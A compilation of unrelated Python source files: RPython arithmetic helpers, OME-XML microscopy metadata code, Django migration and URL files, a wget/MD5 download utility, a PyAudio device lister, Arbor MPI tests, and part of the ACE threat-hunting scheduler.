# we use cast_primitive to go between Float and SingleFloat.
return hop.genop('cast_primitive', [v],
resulttype = lltype.SingleFloat)
def int_between(n, m, p):
""" check that n <= m < p. This assumes that n <= p. This is useful because
the JIT special-cases it. """
from rpython.rtyper.lltypesystem import lltype
from rpython.rtyper.lltypesystem.lloperation import llop
if not objectmodel.we_are_translated():
assert n <= p
return llop.int_between(lltype.Bool, n, m, p)
def int_force_ge_zero(n):
""" The JIT special-cases this too. """
from rpython.rtyper.lltypesystem import lltype
from rpython.rtyper.lltypesystem.lloperation import llop
return llop.int_force_ge_zero(lltype.Signed, n)
@objectmodel.specialize.ll()
def byteswap(arg):
""" Convert little->big endian and the opposite
"""
from rpython.rtyper.lltypesystem import lltype, rffi
from rpython.rlib.longlong2float import longlong2float, float2longlong,\
uint2singlefloat, singlefloat2uint
T = lltype.typeOf(arg)
if T == lltype.SingleFloat:
arg = singlefloat2uint(arg)
elif T == lltype.Float:
arg = float2longlong(arg)
elif T == lltype.LongFloat:
assert False
else:
# we cannot do arithmetics on small ints
arg = widen(arg)
if rffi.sizeof(T) == 1:
res = arg
elif rffi.sizeof(T) == 2:
a, b = arg & 0xFF, arg & 0xFF00
res = (a << 8) | (b >> 8)
elif rffi.sizeof(T) == 4:
FF = r_uint(0xFF)
arg = r_uint(arg)
a, b, c, d = (arg & FF, arg & (FF << 8), arg & (FF << 16),
arg & (FF << 24))
res = (a << 24) | (b << 8) | (c >> 8) | (d >> 24)
elif rffi.sizeof(T) == 8:
FF = r_ulonglong(0xFF)
arg = r_ulonglong(arg)
a, b, c, d = (arg & FF, arg & (FF << 8), arg & (FF << 16),
arg & (FF << 24))
e, f, g, h = (arg & (FF << 32), arg & (FF << 40), arg & (FF << 48),
arg & (FF << 56))
res = ((a << 56) | (b << 40) | (c << 24) | (d << 8) | (e >> 8) |
(f >> 24) | (g >> 40) | (h >> 56))
else:
assert False # unreachable code
if T == lltype.SingleFloat:
return uint2singlefloat(rffi.cast(rffi.UINT, res))
if T == lltype.Float:
return longlong2float(rffi.cast(rffi.LONGLONG, res))
return rffi.cast(T, res)
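# Worked example for the 2-byte branch above: byteswapping 0x1234 gives
#   a = 0x1234 & 0xFF = 0x34, b = 0x1234 & 0xFF00 = 0x1200,
#   res = (a << 8) | (b >> 8) = 0x3400 | 0x12 = 0x3412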
# String parsing support
# ---------------------------
def string_to_int(s, base=10):
"""Utility to converts a string to an integer.
If base is 0, the proper base is guessed based on the leading
characters of 's'. Raises ParseStringError in case of error.
Raises ParseStringOverflowError in case the result does not fit.
"""
from rpython.rlib.rstring import (
NumberStringParser, ParseStringOverflowError, strip_spaces)
s = literal = strip_spaces(s)
p = NumberStringParser(s, literal, base, 'int')
base = p.base
result = 0
while True:
digit = p.next_digit()
if digit == -1:
return result
if p.sign == -1:
digit = -digit
try:
result = ovfcheck(result * base)
result = ovfcheck(result + digit)
except OverflowError:
raise ParseStringOverflowError(p)
string_to_int._elidable_function_ = True
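# For example, string_to_int("  -42 ") returns -42; a result that does not fit in a
# machine-sized int raises ParseStringOverflowError rather than silently wrapping.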
|
# -*- coding: utf-8 -*-
import numpy as np
import logging
import datetime
import oxdls
from .edge_definer import marker_edge_definer
class MetadataMaker():
def __init__(self, image_name, unstitched, datatype):
# Set up attributes and variables
self.boundaries = unstitched.boundaries
self.mosaic_centre = unstitched.mosaic_centre
self.pix2edge = unstitched.pix2edge
self.pixelsize = unstitched.pixel_size
mosaic_dims = self.__get_mosaic_dims()
x_position, y_position = self.__get_x_y_position(self.boundaries, mosaic_dims, unstitched.pixel_size)
physical_mosaic_dims = [dim * unstitched.pixel_size for dim in mosaic_dims]
date_time = datetime.datetime.fromtimestamp(unstitched.modified_timestamp).isoformat() # formatted as: "yyyy-mm-ddThh:mm:ss"
logging.info("Creating OME metadata")
self.ox = oxdls.OMEXML()
image = self.ox.image()
image.set_Name(image_name)
image.set_ID("Image:0")
image.set_AcquisitionDate(date_time)
pixels = image.Pixels
pixels.set_DimensionOrder("XYZCT")
pixels.set_ID("Pixels:0")
pixels.set_PixelType(str(datatype))
pixels.set_SizeX(mosaic_dims[0])
pixels.set_SizeY(mosaic_dims[1])
pixels.set_SizeZ(1)
pixels.set_SizeC(1)
pixels.set_SizeT(1)
pixels.set_PhysicalSizeX(physical_mosaic_dims[0] * 1.e3)
pixels.set_PhysicalSizeXUnit("nm")
pixels.set_PhysicalSizeY(physical_mosaic_dims[1] * 1.e3)
pixels.set_PhysicalSizeYUnit("nm")
pixels.set_PhysicalSizeZ(1) # Z doesn't have corresponding data
pixels.set_PhysicalSizeZUnit("reference frame")
pixels.set_tiffdata_count(1)
pixels.set_plane_count(1)
channel = pixels.channel(0)
channel.set_ID("Channel:0:0")
channel.set_Name("C:0")
tiffdata = pixels.tiffdata(0)
tiffdata.set_FirstC(0)
tiffdata.set_FirstZ(0)
tiffdata.set_FirstT(0)
tiffdata.set_IFD(0)
# Add plane/tiffdata
plane = pixels.plane(0)
plane.set_TheZ(0)
plane.set_TheC(0)
plane.set_TheT(0)
plane.set_PositionXUnit("nm")
plane.set_PositionYUnit("nm")
plane.set_PositionZUnit("reference frame")
plane.set_PositionX(x_position * 1.e3)
plane.set_PositionY(y_position * 1.e3)
plane.set_PositionZ(0)
def add_markers(self, updated_image_name, markerfile):
logging.info("Creating ROIs")
markerlist, marker_numbers = self.__extract_markers(markerfile)
no_of_markers = len(marker_numbers)
image = self.ox.image(0)
image.set_Name(updated_image_name)
image.set_roiref_count(no_of_markers)
self.ox.set_roi_count(no_of_markers)
for count in range(0, no_of_markers, 1):
start, end = marker_edge_definer(
markerlist[count],
self.boundaries,
self.pix2edge
)
image.roiref(count).set_ID(marker_numbers[count])
roi = self.ox.roi(count)
roi.set_ID(marker_numbers[count])
roi.set_Name(f"Marker {marker_numbers[count]}")
rectangle = roi.Union.Rectangle()
rectangle.set_ID(f"Shape:{count}:0")
rectangle.set_Text(f"Area {marker_numbers[count]}")
rectangle.set_TheZ(0)
rectangle.set_TheC(0)
rectangle.set_TheT(0)
# Colour is set using RGBA to int conversion
# RGB colours: Red=-16776961, Green=16711935, Blue=65535
# Calculated the following function from https://docs.openmicroscopy.org/omero/5.5.1/developers/Python.html:
# def rgba_to_int(red, green, blue, alpha=255):
# # Return the color as an Integer in RGBA encoding
# r = red << 24
# g = green << 16
# b = blue << 8
# a = alpha
# rgba_int = r+g+b+a
# if (rgba_int > (2**31-1)): # convert to signed 32-bit int
# rgba_int = rgba_int - 2**32
# return rgba_int
rectangle.set_StrokeColor(-16776961) # Red
rectangle.set_StrokeWidth(20)
rectangle.set_X(start[0])
rectangle.set_Y(start[1])
rectangle.set_Width(end[0] - start[0])
rectangle.set_Height(end[1] - start[1])
def get(self, encoded=False):
if self.ox is not None:
if encoded:
return self.ox.to_xml().encode()
else:
return self.ox
logging.error("Cannot get metadata that has not yet been created.")
return self.ox
def __extract_markers(self, markerfile):
# returns marker coordinates in pixels
array = np.genfromtxt(markerfile, delimiter=",")
marker_coordinates = []
marker_numbers = []
for count in range(len(array[:, 0])):
x, y = array[count, 0:2]
# x is flipped between image and marker coordinates
x = ((-x - self.mosaic_centre[0]) / self.pixelsize)
y = ((y - self.mosaic_centre[1]) / self.pixelsize)
marker_coordinates.append((int(x), int(y)))
marker_numbers.append(int(array[count, -1]))
return marker_coordinates, marker_numbers
@staticmethod
def __get_x_y_position(boundaries, mosaic_dims, pixelsize):
# (minimum position in x & y + half the image size) * pixel size to get physical positions
x_position = (boundaries[0, 0] + (mosaic_dims[0] / 2)) * pixelsize
y_position = (boundaries[0, 1] + (mosaic_dims[1] / 2)) * pixelsize
return x_position, y_position
def __get_mosaic_dims(self):
# In pixels
dim_x = (self.boundaries[1, 0] - self.boundaries[0, 0])
dim_y = (self.boundaries[1, 1] - self.boundaries[0, 1])
return [dim_x, dim_y]
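# Illustrative usage sketch (names other than MetadataMaker are hypothetical; the
# "unstitched" object must expose boundaries, mosaic_centre, pix2edge, pixel_size
# and modified_timestamp, as read in __init__ above):
#
#   maker = MetadataMaker("mosaic_01", unstitched, np.uint16)
#   maker.add_markers("mosaic_01_with_markers", "markers.csv")
#   xml_bytes = maker.get(encoded=True)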
|
# Generated by Django 3.0a1 on 2020-01-30 19:00
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Book',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(help_text='The title of the book.', max_length=70)),
('publication_date', models.DateField(verbose_name='Date the book was published.')),
('isbn', models.CharField(max_length=20, verbose_name='ISBN number of the book.')),
],
),
migrations.CreateModel(
name='Contributor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_names', models.CharField(help_text="The contributor's first name or names.", max_length=50)),
('last_names', models.CharField(help_text="The contributor's last name or names.", max_length=50)),
('email', models.EmailField(help_text='The contact email for the contributor.', max_length=254)),
],
),
migrations.CreateModel(
name='Publisher',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(help_text='The name of the Publisher.', max_length=50)),
('website', models.URLField(help_text="The Publisher's website.")),
('email', models.EmailField(help_text="The Publisher's email address.", max_length=254)),
],
),
migrations.CreateModel(
name='Review',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.TextField(help_text='The Review text.')),
('rating', models.IntegerField(help_text='The rating the reviewer has given.')),
('date_created', models.DateTimeField(auto_now_add=True, help_text='The date and time the review was created.')),
('date_edited', models.DateTimeField(help_text='The date and time the review was last edited.', null=True)),
('book', models.ForeignKey(help_text='The Book that this review is for.', on_delete=django.db.models.deletion.CASCADE, to='reviews.Book')),
('creator', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='BookContributor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('role', models.CharField(choices=[('AUTHOR', 'Author'), ('CO_AUTHOR', 'Co-Author'), ('EDITOR', 'Editor')], max_length=20, verbose_name='The role this contributor had in the book.')),
('book', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reviews.Book')),
('contributor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reviews.Contributor')),
],
),
migrations.AddField(
model_name='book',
name='contributors',
field=models.ManyToManyField(through='reviews.BookContributor', to='reviews.Contributor'),
),
migrations.AddField(
model_name='book',
name='publisher',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reviews.Publisher'),
),
]
|
#!/usr/bin/env python
import os
import sys
import hashlib
import logging
############
#
# Download utilities
#
####
# COPYRIGHT DISCLAIMER:
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
#
# Author: Tim Kahlke, tim.kahlke@audiotax.is
# Date: April 2017
#
# Download files using wget
def wget_file(path,f,outdir):
os.system("wget -O %s/%s %s/%s" % (outdir,f,path,f))
# Check MD5 sum of given file
def check_md5(f,path):
# The .md5 file is expected to contain "<md5 hexdigest> <data file name>"
with open(os.path.join(path,f)) as md5_fh:
fl = md5_fh.readline()
l = [part for part in fl.split() if part]
filehash = hashlib.md5()
filehash.update(open(os.path.join(path,l[1]),'rb').read())
if str(filehash.hexdigest()) != str(l[0]):
return 1
else:
return 0
def down_and_check(ftp,fn,out_dir):
logger = logging.getLogger()
logger.info("\n# [BASTA STATUS] Downloading file %s\n" % (fn))
wget_file(ftp,fn,out_dir)
md5name = fn + ".md5"
logger.info("\n #[BASTA STATUS] Downloading file %s\n" % (md5name))
wget_file(ftp,md5name,out_dir)
logger.info("\n# [BASTA STATUS] Checking MD5 sum of file\n")
while(check_md5(md5name,out_dir)):
logger.error("\n# [BASTA ERROR] MD5 sum mismatch. Re-downloading files!!!\n")
down_and_check(ftp,fn,out_dir)
|
"""activities URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from events.views import Calendar
from base.views import ManagementView, CleanUserView, CleanActivitiesView, BackupView, GroupsMembersView, About
app_name = "base"
urlpatterns = [
url(r'^$', Calendar.as_view()),
url(r'^manage$', ManagementView.as_view(), name="management"),
url(r'^manage/clean_users$', CleanUserView.as_view(), name="clean_users"),
url(r'^manage/clean_activities$', CleanActivitiesView.as_view(), name="clean_activities"),
url(r'^manage/backup$', BackupView.as_view(), name="backup"),
url(r'^manage/groups$', GroupsMembersView.as_view(), name="groups"),
url(r'^manage/groups/add/(?P<pk>\d+)$', GroupsMembersView.as_view(),
kwargs={"operation": "add"}, name="groups_add"),
url(r'^manage/groups/remove/(?P<pk>\d+)$', GroupsMembersView.as_view(),
kwargs={"operation": "remove"}, name="groups_remove"),
url(r'^manage/groups/clear/(?P<pk>\d+)$', GroupsMembersView.as_view(),
kwargs={"operation": "clear"}, name="groups_clear"),
url(r'^about$', About.as_view(), name="about")
]
|
#!/usr/bin/env python3
import pyaudio
import sys
sys.path.insert(0, "../")
from pwmaudio import noALSAerror
with noALSAerror():
p = pyaudio.PyAudio()
info = p.get_host_api_info_by_index(0)
print(p.get_host_api_count())
print(info)
numdevices = info.get('deviceCount')
for i in range(0, numdevices):
if (p.get_device_info_by_host_api_device_index(0, i).get('maxOutputChannels')) > 0:
# print("Output Device id ", i, " - ", p.get_device_info_by_host_api_device_index(0, i).get('name'))
print("Output Device id ", i, " - ", p.get_device_info_by_host_api_device_index(0, i))
|
# -*- coding: utf-8 -*-
#
# test_contexts_mpi4py.py
import unittest
import arbor as arb
# to be able to run .py file from child directory
import sys, os
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../../')))
try:
import options
except ModuleNotFoundError:
from test import options
# check Arbor's configuration of mpi
mpi_enabled = arb.__config__["mpi"]
mpi4py_enabled = arb.__config__["mpi4py"]
if (mpi_enabled and mpi4py_enabled):
import mpi4py.MPI as mpi
"""
all tests for distributed arb.context using mpi4py
"""
# Only test class if env var ARB_WITH_MPI4PY=ON
@unittest.skipIf(mpi_enabled == False or mpi4py_enabled == False, "MPI/mpi4py not enabled")
class Contexts_mpi4py(unittest.TestCase):
def test_initialized_mpi4py(self):
# test mpi initialization (automatically when including mpi4py: https://mpi4py.readthedocs.io/en/stable/mpi4py.run.html)
self.assertTrue(mpi.Is_initialized())
def test_communicator_mpi4py(self):
comm = arb.mpi_comm(mpi.COMM_WORLD)
# test that set communicator is MPI_COMM_WORLD
self.assertEqual(str(comm), '<arbor.mpi_comm: MPI_COMM_WORLD>')
def test_context_mpi4py(self):
comm = arb.mpi_comm(mpi.COMM_WORLD)
# test context with mpi
ctx = arb.context(mpi=comm)
self.assertTrue(ctx.has_mpi)
def test_context_allocation_mpi4py(self):
comm = arb.mpi_comm(mpi.COMM_WORLD)
# test context with alloc and mpi
alloc = arb.proc_allocation()
ctx = arb.context(alloc, comm)
self.assertEqual(ctx.threads, alloc.threads)
self.assertTrue(ctx.has_mpi)
def test_exceptions_context_arbmpi(self):
alloc = arb.proc_allocation()
with self.assertRaisesRegex(RuntimeError,
"mpi must be None, or an MPI communicator"):
arb.context(mpi='MPI_COMM_WORLD')
with self.assertRaisesRegex(RuntimeError,
"mpi must be None, or an MPI communicator"):
arb.context(alloc, mpi=0)
def test_finalized_mpi4py(self):
# test mpi finalization (automatically when including mpi4py, but only just before the Python process terminates)
self.assertFalse(mpi.Is_finalized())
def suite():
# specify class and test functions as tuple (here: all tests starting with 'test' from class Contexts_mpi4py)
suite = unittest.makeSuite(Contexts_mpi4py, ('test'))
return suite
def run():
v = options.parse_arguments().verbosity
comm = arb.mpi_comm(mpi.COMM_WORLD)
alloc = arb.proc_allocation()
ctx = arb.context(alloc, comm)
rank = ctx.rank
if rank == 0:
runner = unittest.TextTestRunner(verbosity = v)
else:
sys.stdout = open(os.devnull, 'w')
runner = unittest.TextTestRunner(stream=sys.stdout)
runner.run(suite())
if __name__ == "__main__":
run()
|
# vim: sw=4:ts=4:et:cc=120
#
# ACE Hunting System
#
# How this works:
# A HunterCollector reads the config and loads all the sections that start with hunt_type_
# each of these configuration settings defines a "hunt type" (example: qradar, splunk, etc...)
# each section looks like this:
# [hunt_type_TYPE]
# module = path.to.module
# class = HuntClass
# rule_dirs = hunts/dir1,hunts/dir2
# concurrency_limit = LIMIT
#
# TYPE is some unique string that identifies the type of the hunt
# the module and class settings define the class that will be used that extends saq.collector.hunter.Hunt
# rule_dirs contains a list of directories to load ini-formatted rules from
# and concurrency_limit defines concurrency constraints (see below)
#
# Each of these "types" is managed by a HuntManager which loads the Hunt-based rules and manages the execution
# of these rules, applying any concurrency constraints required.
#
import configparser
import datetime
import importlib
import logging
import operator
import os, os.path
import signal
import threading
import sqlite3
from croniter import croniter
import pytz
import saq
from saq.collectors import Collector, Submission
from saq.constants import *
from saq.error import report_exception
from saq.network_semaphore import NetworkSemaphoreClient
from saq.util import local_time, create_timedelta, abs_path, create_directory
class InvalidHuntTypeError(ValueError):
pass
def get_hunt_db_path(hunt_type):
return os.path.join(saq.DATA_DIR, saq.CONFIG['collection']['persistence_dir'], 'hunt', f'{hunt_type}.db')
def open_hunt_db(hunt_type):
"""Utility function to open sqlite3 database with correct parameters."""
return sqlite3.connect(get_hunt_db_path(hunt_type), detect_types=sqlite3.PARSE_DECLTYPES | sqlite3.PARSE_COLNAMES)
class Hunt(object):
"""Abstract class that represents a single hunt."""
def __init__(
self,
enabled=None,
name=None,
description=None,
manager=None,
alert_type=None,
analysis_mode=None,
frequency=None,
tags=[]):
self.enabled = enabled
self.name = name
self.description = description
self.manager = manager
self.alert_type = alert_type
self.analysis_mode = analysis_mode
self.frequency = frequency
self.tags = tags
self.cron_schedule = None
self.queue = QUEUE_DEFAULT
# a datetime.timedelta that represents how long to suppress until this hunt starts to fire again
self.suppression = None
# datetime.datetime of when the suppression currently applied to this hunt ends
# if this value is None then no suppression is currently being applied
self.suppression_end = None
# the last time the hunt was executed
# see the last_executed_time property
#self.last_executed_time = None # datetime.datetime
# a threading.RLock that is held while executing
self.execution_lock = threading.RLock()
# a way for the controlling thread to wait for the hunt execution thread to start
self.startup_barrier = threading.Barrier(2)
# if this is True then we're executing the Hunt outside of normal operations
# in that case we don't want to record any of the execution time stamps
self.manual_hunt = False
# this property maps to the "tool_instance" property of alerts
# this shows where the alert came from
# by default we use localhost
# subclasses might use the address or url they are hitting for their queries
self.tool_instance = 'localhost'
# when we load from an ini file we record the last modified time of the file
self.ini_path = None
self.last_mtime = None
@property
def type(self):
if self.manager is not None:
return self.manager.hunt_type or None
else:
return None
@property
def last_executed_time(self):
# if we don't already have this value then load it from the sqlite db
if hasattr(self, '_last_executed_time'):
return self._last_executed_time
else:
with open_hunt_db(self.type) as db:
c = db.cursor()
c.execute("SELECT last_executed_time FROM hunt WHERE hunt_name = ?",
(self.name,))
row = c.fetchone()
if row is None:
self._last_executed_time = None
return self._last_executed_time
else:
self._last_executed_time = row[0]
if self._last_executed_time is not None and self._last_executed_time.tzinfo is None:
self._last_executed_time = pytz.utc.localize(self._last_executed_time)
return self._last_executed_time
@last_executed_time.setter
def last_executed_time(self, value):
if value.tzinfo is None:
value = pytz.utc.localize(value)
with open_hunt_db(self.type) as db:
c = db.cursor()
c.execute("UPDATE hunt SET last_executed_time = ? WHERE hunt_name = ?",
(value.replace(tzinfo=None), self.name))
# NOTE -- datetime with tzinfo not supported by default timestamp converter in 3.6
db.commit()
self._last_executed_time = value
def __str__(self):
return f"Hunt({self.name}[{self.type}])"
def cancel(self):
"""Called when the hunt needs to be cancelled, such as when the system is shutting down.
This must be safe to call even if the hunt is not currently executing."""
logging.warning(f"called cancel on hunt {self} but {self.type} does not support cancel")
def execute_with_lock(self, *args, **kwargs):
# we use this lock to determine if a hunt is running, and, to wait for execution to complete.
logging.debug(f"waiting for execution lock on {self}")
self.execution_lock.acquire()
# remember the last time we executed
self.last_executed_time = local_time()
# notify the manager that this is now executing
# this releases the manager thread to continue processing hunts
logging.debug(f"clearing barrier for {self}")
self.startup_barrier.wait()
submission_list = None
try:
logging.info(f"executing {self}")
start_time = local_time()
result = self.execute(*args, **kwargs)
self.record_execution_time(local_time() - start_time)
return result
except Exception as e:
logging.error(f"{self} failed: {e}")
report_exception()
self.record_hunt_exception(e)
finally:
self.startup_barrier.reset()
self.execution_lock.release()
def execute(self, *args, **kwargs):
"""Called to execute the hunt. Returns a list of zero or more saq.collector.Submission objects."""
raise NotImplementedError()
def wait(self, *args, **kwargs):
"""Waits for the hunt to complete execution. If the hunt is not running then it returns right away.
Returns False if a timeout is set and the lock is not released during that timeout.
Additional parameters are passed to execution_lock.acquire()."""
result = self.execution_lock.acquire(*args, **kwargs)
if result:
self.execution_lock.release()
return result
@property
def running(self):
"""Returns True if the hunt is currently executing, False otherwise."""
# when the hunt is executing it will have this lock enabled
result = self.execution_lock.acquire(blocking=False)
if result:
self.execution_lock.release()
return False
return True
def load_from_ini(self, path):
"""Loads the settings for the hunt from an ini formatted file. This function must return the
ConfigParser object used to load the settings."""
config = configparser.ConfigParser(interpolation=None)
config.optionxform = str # preserve case when reading option names
config.read(path)
section_rule = config['rule']
# is this a supported type?
if section_rule['type'] != self.type:
raise InvalidHuntTypeError(section_rule['type'])
self.enabled = section_rule.getboolean('enabled')
# if we don't pass the name then we create it from the name of the ini file
self.name = section_rule.get(
'name',
fallback=(os.path.splitext(os.path.basename(path))[0]).replace('_', ' ').title())
self.description = section_rule['description']
# if we don't pass an alert type then we default to the type field
self.alert_type = section_rule.get('alert_type', fallback=f'hunter - {self.type}')
self.analysis_mode = section_rule.get('analysis_mode', fallback=ANALYSIS_MODE_CORRELATION)
# frequency can be either a timedelta or a crontab entry
self.frequency = None
if ':' in section_rule['frequency']:
self.frequency = create_timedelta(section_rule['frequency'])
        # suppression must be either empty or a timedelta
self.suppression = None
if 'suppression' in section_rule and section_rule['suppression']:
self.suppression = create_timedelta(section_rule['suppression'])
self.cron_schedule = None
if self.frequency is None:
self.cron_schedule = section_rule.get('cron_schedule', fallback=section_rule['frequency'])
# make sure this crontab entry parses
croniter(self.cron_schedule)
self.tags = [_.strip() for _ in section_rule['tags'].split(',') if _]
self.queue = section_rule['queue'] if 'queue' in section_rule else QUEUE_DEFAULT
self.ini_path = path
self.last_mtime = os.path.getmtime(path)
return config
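    # A hedged sketch of the ini layout this loader expects; the option names mirror
    # the keys read above, while the section values themselves are hypothetical.
    #   [rule]
    #   type = example
    #   enabled = yes
    #   name = Example Hunt
    #   description = an example hunt definition
    #   frequency = 00:10:00          ; a timedelta, or a crontab entry such as */10 * * * *
    #   suppression =
    #   tags = example, hunting
    #   queue = default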
@property
def is_modified(self):
""""Returns True if this hunt has been modified since it has been loaded."""
return self.ini_is_modified
@property
def ini_is_modified(self):
"""Returns True if this hunt was loaded from an ini file and that file has been modified since we loaded it."""
try:
return self.last_mtime != os.path.getmtime(self.ini_path)
except FileNotFoundError:
return True
        except Exception as e:
            logging.error(f"unable to check last modified time of {self.ini_path}: {e}")
return False
@property
def ready(self):
"""Returns True if the hunt is ready to execute, False otherwise."""
# if it's already running then it's not ready to run again
if self.running:
return False
# is this hunt currently suppressed?
if self.suppression_end:
if datetime.datetime.now() < self.suppression_end:
return False
self.suppression_end = None
logging.info(f"hunt {self} has exited suppression")
# if we haven't executed it yet then it's ready to go
if self.last_executed_time is None:
return True
# otherwise we're not ready until it's past the next execution time
return local_time() >= self.next_execution_time
@property
def next_execution_time(self):
"""Returns the next time this hunt should execute."""
# if using cron schedule instead of frequency
if self.cron_schedule is not None:
if self.last_executed_time is None:
self.last_executed_time = local_time()
cron_parser = croniter(self.cron_schedule, self.last_executed_time)
return cron_parser.get_next(datetime.datetime)
        # if using frequency instead of cron schedule
else:
# if it hasn't executed at all yet, then execute it now
if self.last_executed_time is None:
return local_time()
return self.last_executed_time + self.frequency
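    # For reference, a minimal croniter sketch (values hypothetical): given a schedule
    # of "*/5 * * * *" and a base time, get_next() yields the following 5-minute
    # boundary, which is what next_execution_time returns above for cron-based hunts.
    #   >>> import datetime
    #   >>> base = datetime.datetime(2020, 1, 1, 12, 2)
    #   >>> croniter("*/5 * * * *", base).get_next(datetime.datetime)
    #   datetime.datetime(2020, 1, 1, 12, 5)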
def apply_suppression(self):
"""Apply suppression to this hunt if it is configured to do so.
This is called by the manager when the hunt generates Submissions."""
if self.suppression:
self.suppression_end = datetime.datetime.now() + self.suppression
logging.info(f"hunt {self} is suppressed until {self.suppression_end}")
def record_execution_time(self, time_delta):
"""Record the amount of time it took to execute this hunt."""
pass
def record_hunt_exception(self, exception):
"""Record the details of a failed hunt."""
pass
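# A minimal sketch of a concrete hunt type (not part of the original module); it only
# illustrates the interface: subclasses override execute() to return zero or more
# saq.collector.Submission objects and may override cancel() for early shutdown.
# The class name and behavior below are hypothetical.
class ExampleNoopHunt(Hunt):
    def execute(self, *args, **kwargs):
        # a real hunt would query its data source here and wrap each hit
        # in a Submission object; an empty list means nothing was found
        return []
    def cancel(self):
        # override to interrupt a long-running query when the manager shuts down
        pass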
CONCURRENCY_TYPE_NETWORK_SEMAPHORE = 'network_semaphore'
CONCURRENCY_TYPE_LOCAL_SEMAPHORE = 'local_semaphore'
class HuntManager(object):
"""Manages the hunting for a single hunt type."""
def __init__(self,
collector,
hunt_type,
rule_dirs,
hunt_cls,
concurrency_limit,
persistence_dir,
update_frequency,
config):
assert isinstance(collector, Collector)
assert isinstance(hunt_type, str)
assert isinstance(rule_dirs, list)
assert issubclass(hunt_cls, Hunt)
assert concurrency_limit is None or isinstance(concurrency_limit, int) or isinstance(concurrency_limit, str)
assert isinstance(persistence_dir, str)
assert isinstance(update_frequency, int)
# reference to the collector (used to send the Submission objects)
self.collector = collector
# primary execution thread
self.manager_thread = None
# thread that handles tracking changes made to the hunts loaded from ini
self.update_manager_thread = None
# shutdown valve
self.manager_control_event = threading.Event()
self.wait_control_event = threading.Event()
# control signal to reload the hunts (set by SIGHUP indirectly)
self.reload_hunts_flag = False
# the type of hunting this manager manages
self.hunt_type = hunt_type
# the list of directories that contain the hunt configuration ini files for this type of hunt
self.rule_dirs = rule_dirs
# the class used to instantiate the rules in the given rules directories
self.hunt_cls = hunt_cls
# when loaded from config, store the entire config so it available to Hunts
self.config = config
# sqlite3 database used to keep track of hunt persistence data
create_directory(os.path.dirname(get_hunt_db_path(self.hunt_type)))
if not os.path.exists(get_hunt_db_path(self.hunt_type)):
with open_hunt_db(self.hunt_type) as db:
c = db.cursor()
# XXX have to support all future schemas here -- not a great design
c.execute("""
CREATE TABLE hunt (
hunt_name TEXT NOT NULL,
last_executed_time timestamp,
last_end_time timestamp )""")
c.execute("""
CREATE UNIQUE INDEX idx_name ON hunt(hunt_name)""")
db.commit()
# the list of Hunt objects that are being managed
self._hunts = []
# acquire this lock before making any modifications to the hunts
self.hunt_lock = threading.RLock()
# the ini files that failed to load
self.failed_ini_files = {} # key = ini_path, value = os.path.getmtime()
# the ini files that we skipped
self.skipped_ini_files = set() # key = ini_path
        # the type of concurrency constraint this type of hunt uses (can be None)
# use the set_concurrency_limit() function to change it
self.concurrency_type = None
# the local threading.Semaphore if the type is CONCURRENCY_TYPE_LOCAL_SEMAPHORE
        # or the string name of the network semaphore if the type is CONCURRENCY_TYPE_NETWORK_SEMAPHORE
self.concurrency_semaphore = None
if concurrency_limit is not None:
self.set_concurrency_limit(concurrency_limit)
# this is set to True if load_hunts_from_config() is called
# and used when reload_hunts_flag is set
self.hunts_loaded_from_config = False
# how often do we check to see if the hunts have been modified?
self.update_frequency = update_frequency
def __str__(self):
return f"Hunt Manager({self.hunt_type})"
@property
def hunts(self):
"""Returns a sorted copy of the list of hunts in execution order."""
return sorted(self._hunts, key=operator.attrgetter('next_execution_time'))
def get_hunts(self, spec):
"""Returns the hunts that match the given specification, where spec is a function that takes a Hunt
        as its single parameter and returns True or False to indicate whether it should be included in the results."""
return [hunt for hunt in self._hunts if spec(hunt)]
def get_hunt(self, spec):
"""Returns the first hunt that matches the given specification, where spec is a function that takes a Hunt
        as its single parameter and returns True or False to indicate whether it should be included in the results.
Returns None if no hunts are matched."""
result = self.get_hunts(spec)
if not result:
return None
return result[0]
def get_hunt_by_name(self, name):
"""Returns the Hunt with the given name, or None if the hunt does not exist."""
for hunt in self._hunts:
if hunt.name == name:
return hunt
return None
def signal_reload(self):
"""Signals to this manager that the hunts should be reloaded.
The work takes place on the manager thread."""
logging.debug("received signal to reload hunts")
self.reload_hunts_flag = True
self.wait_control_event.set()
def reload_hunts(self):
"""Reloads the hunts. This is called when reload_hunts_flag is set to True.
If the hunts were loaded from the configuration then the current Hunt objects
are discarded and new ones are loaded from configuration.
Otherwise this function does nothing."""
self.reload_hunts_flag = False
if not self.hunts_loaded_from_config:
logging.debug(f"{self} received signal to reload but hunts were not loaded from configuration")
return
logging.info(f"{self} reloading hunts")
